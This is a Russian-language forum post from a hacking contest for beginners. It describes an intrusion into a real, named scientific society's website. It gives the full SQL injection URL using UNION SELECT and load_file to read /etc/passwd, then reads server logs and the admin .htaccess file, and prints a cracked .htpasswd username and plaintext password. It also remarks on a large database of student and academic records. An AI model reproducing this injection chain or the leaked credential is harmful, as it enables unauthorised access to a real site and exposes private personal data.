Форум АНТИЧАТ - Показать сообщение отдельно - Конкурс уязвимостей для новичков

http://www.sicb.org/

FILE_PRIV=Y

106 columns

/etc/passwd:

Код:

http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632f706173737764),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106+from+mysql.user

Методом ручного фазинга узнаем расположение логов.

Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html

Читаем .htaccess админки из /var/www/html/admin/.htaccess:

Цитата:

Сообщение от None

AuthUserFile /home/sicb/includes/.htpasswd
AuthName "SICB Admin realm"
AuthType Basic
require valid-user

Читаем файл с паролем и брутим:

Цитата:

Сообщение от None

ruedi:UMn02wTYUxVGc -> ottilie

Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим.

PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.